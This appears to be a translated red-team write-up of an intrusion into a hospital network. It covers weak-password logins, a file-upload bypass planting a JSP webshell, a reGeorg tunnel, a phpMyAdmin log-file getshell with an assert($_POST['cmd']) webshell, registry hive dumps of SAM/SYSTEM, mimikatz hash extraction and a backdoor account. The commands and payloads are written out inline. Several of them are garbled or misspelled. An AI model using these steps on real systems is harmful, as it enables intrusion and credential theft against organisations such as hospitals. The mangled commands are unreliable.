Title: A HW battle

0x00 Information Collection

received an emergency test task, with only one target name (some hospital) and one IP.

First, use a goby shuttle to scan the IP obtained with a full port:

Services include Weblogic, jboss, springboot, Struts2, and various other systems (it's simply Nday practice range)

0x01 External network penetration

Among them, they tried to use jexboss to deserialize, deserialize the Weblogic (version 10.3.6.0), other CVE vulnerabilities of Weblogic, unauthorized springboot, and deserialize the Struts2 vulnerabilities all failed.

However, weak passwords were found on the clinical skills center management platform on port 8282

(admin/admin) can successfully log in to the background:

After testing, the settings of the screen information management system under the target dictionary management show that any file upload exists in the picture.

Just upload the jsp with the png suffix immediately, and use BurpSuite to directly capture the packet and change it to the jsp suffix.

After uploading, access the target url and the webshell exists, but using Godzilla to directly connect will fail.

After Master Hum discovered that the cookie on the current page is required when linking (the target forced the URL to jump. If it is not logged in, it will return to the Login page.)

In this way, the webshell's url cannot be accessed normally. The webshell can be connected normally with a cookie (after the cookie expires, the webshell will drop).

After the connection is successful, in order to stabilize the webshell, we try to write the webshell to the root directory and the directory of the static file, but it will still be affected by forced jumps.

So the webshell content is written into the normal jsp file that can be accessed before logging in to stabilize the shell.

0x02 Intranet penetration

After that, the target was collected. The portal web server is a Linux host, and it cannot upload large files. There is a forced jump to the web path, and the IP is 172.20.10.49

First, I tried Neo-reGeorg, wrote the webshell to the website root directory, and brought cookies to proxy, but failed (I guess the reason might be that the website's forced jump problem)

Afterwards, try pystinger (Stinger). After uploading Server and webshell to the target machine, I found that it could not be executed normally (the program reported an error, and it seemed that the code was wrong)

So I changed back to Neo-reGeorg again, and this time I tried to replace a normal jsp page in the target website with our Neo-reGeorg tunnel.jsp content

It was found that the target had no forced jump (it was guessed that the target was a forced jump based on the file name and was whitelisted), and the connection was attempted locally, and the proxy was normal (the error was reported without affecting).

Try to use Ladon to scan the intranet through forward proxy (the command is Ladon.exe 172.20.10.1/24 WebScan), and the scan results are as follows

It is found that the target has a phpStudy probe page, and the probe page has a mysql weak password root, root

Scan the directory and found that there is also a phpmyadmin page under this IP, you can use root and root to log in.

After testing, the database user does not have the export permissions of outfile, but can pass the log getshell

Change general_log_file to 222.php in the root directory of the website

Execute select ?php phpinfo(); assert($_POST['cmd']); to getshell

It was found that the host of the station is a Windows host, system permissions, but it still does not leave the network.

Check the process and use tasklist to compare the soft killing process, and find that the target host has Kaspersky (the process is avp.exe)

The CobaltZirs0n master tried to use the shadow copy method to obtain the target SYSTEM, SECURITY, and SAM files to be decrypted locally offline, but after running the wmic shadowcopy call create Volume='C:' command, and an error broke out when using vssadmin list shadows to query, prompting that there is no registered class

Since it is system permission, try to use powershell to directly export files

regsavehklmsystemSYSTEMregsavehklmscuritySECURITYreg save hklmsam SAM

Use mimikatz to successfully decrypt hash (the password cannot be decoded)

There are three ways to log in to the remote desktop at this time

1. Add an account directly (Kaspersky does not intercept) 2. Add a shadow account 3. Use mimikatz to do pth to make hash overwrite mstsc login administrator user chooses to add an account to log in here, and intends to use the host as a proxy to scan the intranet with fscan (the site was closed later, and it did not go deeper)

At this point, the administrator should have discovered the movements in the intranet and directly closed the site backhand.

0x03 Penetration Summary

1. Scan the target IP through Goby and found that there is a middleware component for weblogcig, jbos, springboot, strust2 2. Try to deserialize weblogcig, jbos, strust2 for testing, but no discovery, and test sprintboot unauthorized access, and there is no 3. On port 8082, I found that there is a weak password (admin, admin) on the clinical skills center management platform. Enter the background and found that the image upload location is uploaded. There is a file upload. Here is a jsp file, and connect through Godzilla. It prompts that the connection fails. You need to add a cookie value to Godzilla's request configuration before you can connect (the website has set up a system that is not logged in. If you visit the website page, you can force jump to the login page) 4 Here, you can upload Neo-reGeorg's tunnel.jsp through Godzilla, and access tunnel.jsp prompts an error (the target is a forced jump based on the file name, and it is a whitelist). Therefore, the content of the page in the website is replaced with the content of tunnel.jsp, which can be accessed normally 5. Here, reGeorg+Proxifier is used here. Perform a local socks proxy. The local proxy scans the intranet segment where the target system is located through Ladon.exe 172.20.10.1/24 WebScan, and found that there is a phpstudy probe page in 172.20.10.49. The local proxy accesses the 172.20.10.49 page through chrome.exe. The mysql service in the page has a weak root/root password. 6. At the same time, the local agent scans the directory of 172.20.10.49 through dirsearch and finds that there is a phpmyadmin page.7. The local agent accesses 172.20.10.49/phpymadin through chrome.exe, and enters through the weak password root/root. The absolute path of the website is found through the show variables like ‘%general%’, and writes webshellselect ?php phpinfo(); assert($_POST['cmd']);into outfile 'E:/phpStudy/WWW/shell.php'; getshell8. The local agent links through the Ajian 172.20.10.49/shell.php. and executes the tasklist to see that Akaspersky (avp.exe) exists in the system. Whoami querys that it is system permissions 9. After trying to execute the command wmic shadowcopy call create Volume='C:', an error broke out when using vssadmin list shadows to query, prompting that there is no registered class 10. Try to use powershell to directly export the file (system permissions are required) powershell reg save HKLM\SYSTEM E:/phpstudy/www/systempowershell reg save HKLM\SECRRITY E:/phpstudy/www/securitypowershell reg save HKLM\\SAM E:/phpstudy/www/sam11. Try mimikatz to successfully decrypt the hash value mimiatz#lsadum:sam /sam:sam.hiv /system:system.hiv

Reprinted from: Fight Tigers Team